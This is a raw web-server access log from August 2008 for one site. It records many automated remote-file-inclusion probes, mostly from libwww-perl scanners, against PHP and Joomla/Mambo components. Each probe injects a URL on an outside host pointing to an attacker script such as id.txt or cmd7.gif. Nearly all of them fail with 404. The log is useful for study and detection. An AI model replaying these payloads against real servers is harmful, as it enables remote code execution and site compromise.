89.108.67.220 - - [21/Aug/2008:05:00:08 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
74.55.136.66 - - [21/Aug/2008:05:00:20 -0700] "GET /errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
213.248.60.128 - - [21/Aug/2008:05:00:26 -0700] "GET /logs/access_080804.log//index.php?DOCUMENT_ROOT=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
79.7.59.60 - - [21/Aug/2008:05:02:37 -0700] "GET /logs/access_080724.log/lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
79.7.59.60 - - [21/Aug/2008:05:02:37 -0700] "GET /lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
79.7.59.60 - - [21/Aug/2008:05:02:38 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
89.108.67.220 - - [21/Aug/2008:05:02:53 -0700] "GET /logs/access.log/index.php?_SERVER[DOCUMENT_ROOT]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
89.108.67.220 - - [21/Aug/2008:05:02:54 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
89.108.67.220 - - [21/Aug/2008:05:02:54 -0700] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:05:04:14 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,28/component/option,com_sitemap/Itemid,57//component/option,com_sitemap/Itemid,32/component/option,com_sitemap/Itemid,121/component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:05:04:14 -0700] "GET /logs//component/option,com_sitemap/Itemid,28/component/option,com_sitemap/Itemid,57//component/option,com_sitemap/Itemid,32/component/option,com_sitemap/Itemid,121/component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:05:04:14 -0700] "GET //component/option,com_sitemap/Itemid,28/component/option,com_sitemap/Itemid,57//component/option,com_sitemap/Itemid,32/component/option,com_sitemap/Itemid,121/component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
217.113.53.6 - - [21/Aug/2008:05:05:55 -0700] "GET /logs/access_080804.log//modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
217.113.53.6 - - [21/Aug/2008:05:05:55 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
217.113.53.6 - - [21/Aug/2008:05:05:56 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
217.113.53.6 - - [21/Aug/2008:05:05:56 -0700] "GET /logs/access_080813.log//modules/xfsection/modify.php?dir_module=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:05:06:06 -0700] "GET /logs/access_080815.log//component/option,com_sitemap/Itemid,28/component/option,com_sitemap/Itemid,57//component/option,com_sitemap/Itemid,32/component/option,com_sitemap/Itemid,121/component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
75.125.40.130 - - [21/Aug/2008:05:06:20 -0700] "GET /logs/access_080809.log/index.php?sourcedir=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
75.125.40.130 - - [21/Aug/2008:05:06:20 -0700] "GET /logs/index.php?sourcedir=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
75.125.40.130 - - [21/Aug/2008:05:06:20 -0700] "GET /index.php?sourcedir=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
75.125.40.130 - - [21/Aug/2008:05:07:00 -0700] "GET /logs/access_080808.log/index.php?sourcedir=http://www.rocks-guild.com/raid//templates_c/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
89.208.43.121 - - [21/Aug/2008:05:07:20 -0700] "GET //skin/zero_vote/errors.php?dir=http://natsweddings.com/editor/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
89.208.43.121 - - [21/Aug/2008:05:07:20 -0700] "GET /logs/access_080809.log//skin/zero_vote/errors.php?dir=http://natsweddings.com/editor/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
89.208.43.121 - - [21/Aug/2008:05:07:22 -0700] "GET /logs//skin/zero_vote/errors.php?dir=http://natsweddings.com/editor/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:05:07:59 -0700] "GET /logs/access_080724.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:05:08:00 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
195.39.5.203 - - [21/Aug/2008:05:08:00 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.loblab.com/mgm/vote/include/iddc9.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
77.74.192.227 - - [21/Aug/2008:05:08:10 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://relemerge.org/images/gabungan.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "heyhovies.com"
77.74.192.227 - - [21/Aug/2008:05:08:10 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://relemerge.org/images/gabungan.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "heyhovies.com"
77.74.192.227 - - [21/Aug/2008:05:08:10 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://relemerge.org/images/gabungan.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "heyhovies.com"
65.254.58.42 - - [21/Aug/2008:05:09:39 -0700] "GET /errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
65.254.58.42 - - [21/Aug/2008:05:10:01 -0700] "GET /errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.heyhovies.com"
65.254.58.42 - - [21/Aug/2008:05:10:02 -0700] "GET /logs/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.heyhovies.com"
89.208.43.121 - - [21/Aug/2008:05:10:07 -0700] "GET /logs/access_080813.log//skin/zero_vote/errors.php?dir=http://natsweddings.com/editor/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
118.34.216.17 - - [21/Aug/2008:05:10:21 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
118.34.216.17 - - [21/Aug/2008:05:10:22 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
91.84.19.133 - - [21/Aug/2008:05:10:34 -0700] "GET /logs/access_080813.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
91.84.19.133 - - [21/Aug/2008:05:10:34 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
91.84.19.133 - - [21/Aug/2008:05:10:34 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
91.84.19.133 - - [21/Aug/2008:05:10:42 -0700] "GET /logs/access_080804.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
165.166.201.202 - - [21/Aug/2008:05:10:52 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
79.7.59.60 - - [21/Aug/2008:05:10:58 -0700] "GET /logs/access_080813.log/lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
65.254.58.42 - - [21/Aug/2008:05:11:59 -0700] "GET /logs/access.log/errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
65.254.58.42 - - [21/Aug/2008:05:11:59 -0700] "GET /errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
65.254.58.42 - - [21/Aug/2008:05:12:10 -0700] "GET /logs/errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
79.7.59.60 - - [21/Aug/2008:05:12:23 -0700] "GET /logs/access_080813.log/lostpasswd.php?env[include_prefix]=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:05:12:40 -0700] "GET /logs/access_080813.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:05:12:41 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:05:12:41 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:05:12:46 -0700] "GET /logs/access_080804.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
209.25.170.18 - - [21/Aug/2008:05:12:59 -0700] "GET /error.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
208.83.209.18 - - [21/Aug/2008:05:13:14 -0700] "GET /logs/access.log%20//component/option,com_sitemap/Itemid,28/component/option,com_sitemap/Itemid,57//component/option,com_sitemap/Itemid,32/component/option,com_sitemap/Itemid,121/component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
201.130.79.130 - - [21/Aug/2008:05:13:49 -0700] "GET /logs/access.log%20//component/option,com_sitemap/Itemid,28/component/option,com_sitemap/Itemid,57//component/option,com_sitemap/Itemid,32/component/option,com_sitemap/Itemid,121/component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
86.58.154.237 - - [21/Aug/2008:05:15:14 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
212.115.37.130 - - [21/Aug/2008:05:15:42 -0700] "GET /logs/errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "heyhovies.com"
212.115.37.130 - - [21/Aug/2008:05:15:42 -0700] "GET /errors.php?error=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "heyhovies.com"
91.84.19.133 - - [21/Aug/2008:05:16:19 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
195.56.111.194 - - [21/Aug/2008:05:17:06 -0700] "GET /logs/access.log//playing.php/common/db.php?commonpath=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
195.56.111.194 - - [21/Aug/2008:05:17:07 -0700] "GET /logs//playing.php/common/db.php?commonpath=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
195.56.111.194 - - [21/Aug/2008:05:17:07 -0700] "GET //playing.php/common/db.php?commonpath=http://www.pixmag.co.za/templates/rt_replicant/rokzoom/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
64.156.26.41 - - [21/Aug/2008:05:18:38 -0700] "GET /logs/access_080731.log/index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
64.156.26.41 - - [21/Aug/2008:05:18:39 -0700] "GET /logs/index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
64.156.26.41 - - [21/Aug/2008:05:18:39 -0700] "GET /index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
207.210.89.58 - - [21/Aug/2008:05:21:01 -0700] "GET /logs/index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
207.210.89.58 - - [21/Aug/2008:05:21:02 -0700] "GET /logs/access_080731.log/index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
207.210.89.58 - - [21/Aug/2008:05:21:09 -0700] "GET /index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
89.108.67.220 - - [21/Aug/2008:05:21:17 -0700] "GET /logs/access_080724.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
89.108.67.220 - - [21/Aug/2008:05:21:18 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
89.108.67.220 - - [21/Aug/2008:05:21:18 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
89.108.67.220 - - [21/Aug/2008:05:21:20 -0700] "GET /logs/access.log/index.php?_SERVER[DOCUMENT_ROOT]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
89.108.67.220 - - [21/Aug/2008:05:21:20 -0700] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
89.108.67.220 - - [21/Aug/2008:05:21:20 -0700] "GET /logs/index.php?_SERVER[DOCUMENT_ROOT]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
200.253.14.108 - - [21/Aug/2008:05:24:37 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.heyhovies.com"
200.253.14.108 - - [21/Aug/2008:05:24:37 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.heyhovies.com"
200.251.43.82 - - [21/Aug/2008:05:24:53 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
200.251.43.82 - - [21/Aug/2008:05:24:53 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
89.108.67.220 - - [21/Aug/2008:05:25:33 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.heyhovies.com"
69.94.70.15 - - [21/Aug/2008:05:25:54 -0700] "GET /logs/access_080731.log/?sourcedir=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
69.94.70.15 - - [21/Aug/2008:05:25:54 -0700] "GET /?sourcedir=http://warsector.ru/access2006.log??? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.heyhovies.com"
69.94.70.15 - - [21/Aug/2008:05:25:54 -0700] "GET /logs/?sourcedir=http://warsector.ru/access2006.log??? HTTP/1.1" 200 1367 "-" "libwww-perl/5.65" "www.heyhovies.com"
200.168.190.201 - - [21/Aug/2008:05:26:09 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
200.168.190.201 - - [21/Aug/2008:05:26:09 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
69.94.70.15 - - [21/Aug/2008:05:26:12 -0700] "GET /logs/access_080724.log/?sourcedir=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.heyhovies.com"
64.156.26.41 - - [21/Aug/2008:05:27:05 -0700] "GET /logs/access_080729.log/index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
207.210.89.58 - - [21/Aug/2008:05:28:34 -0700] "GET /logs/access_080729.log/index2.php?x=http://www.andreysemenov.ru/gb/images/matheus/bot/idnew.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.heyhovies.com"
200.213.33.2 - - [21/Aug/2008:05:30:30 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
200.213.33.2 - - [21/Aug/2008:05:30:31 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:05:36:35 -0700] "GET //components/com_flyspray/startdown.php?file=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:05:36:35 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
81.169.137.253 - - [21/Aug/2008:05:36:35 -0700] "GET /logs/access_080813.log//components/com_flyspray/startdown.php?file=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:38:38 -0700] "GET /logs/access_080724.log/errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:38:38 -0700] "GET /errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:38:49 -0700] "GET /logs/access.log/errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:38:50 -0700] "GET /logs/access_080724.log/errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:38:50 -0700] "GET /errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:38:50 -0700] "GET /logs/errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:39:02 -0700] "GET /logs/access.log/errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
139.146.145.67 - - [21/Aug/2008:05:39:58 -0700] "GET //mailaccess/pop3.php?CONFIG[pear_dir]=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
139.146.145.67 - - [21/Aug/2008:05:39:58 -0700] "GET /logs/access_080809.log//mailaccess/pop3.php?CONFIG[pear_dir]=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
139.146.145.67 - - [21/Aug/2008:05:39:58 -0700] "GET /logs//mailaccess/pop3.php?CONFIG[pear_dir]=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:41:53 -0700] "GET /errors.php?error=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
88.191.62.117 - - [21/Aug/2008:05:45:20 -0700] "GET //index.php?show=http://jonclan.vndv.com/id/vid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
88.191.62.117 - - [21/Aug/2008:05:45:20 -0700] "GET /logs/access_080731.log//index.php?show=http://jonclan.vndv.com/id/vid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
88.191.62.117 - - [21/Aug/2008:05:45:21 -0700] "GET /logs//index.php?show=http://jonclan.vndv.com/id/vid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
88.191.62.117 - - [21/Aug/2008:05:45:27 -0700] "GET /logs/access_080731.log//?p=http://jonclan.vndv.com/id/vid.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
88.191.62.117 - - [21/Aug/2008:05:45:27 -0700] "GET /logs//?p=http://jonclan.vndv.com/id/vid.txt%0D?? HTTP/1.1" 200 1372 "-" "libwww-perl/5.803" "www.heyhovies.com"
88.191.62.117 - - [21/Aug/2008:05:45:28 -0700] "GET //?p=http://jonclan.vndv.com/id/vid.txt%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:05:46:21 -0700] "GET /logs/access_080809.log/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:05:46:22 -0700] "GET /errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
77.74.192.227 - - [21/Aug/2008:05:46:23 -0700] "GET /!rfihttp://relemerge.org/images/gabungan.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
77.74.192.227 - - [21/Aug/2008:05:46:23 -0700] "GET /logs/!rfihttp://relemerge.org/images/gabungan.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
77.74.192.227 - - [21/Aug/2008:05:46:23 -0700] "GET /logs/access_080813.log/!rfihttp://relemerge.org/images/gabungan.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.heyhovies.com"
201.17.129.24 - - [21/Aug/2008:05:46:23 -0700] "GET /logs/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.heyhovies.com"
128.163.2.43 - - [21/Aug/2008:05:46:44 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kainotesglobal.com/ecommerce/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.heyhovies.com"
139.146.145.67 - - [21/Aug/2008:05:46:46 -0700] "GET /logs/access_080813.log/!rfihttp://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
139.146.145.67 - - [21/Aug/2008:05:46:46 -0700] "GET /!rfihttp://borneo.siteburg.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.heyhovies.com"
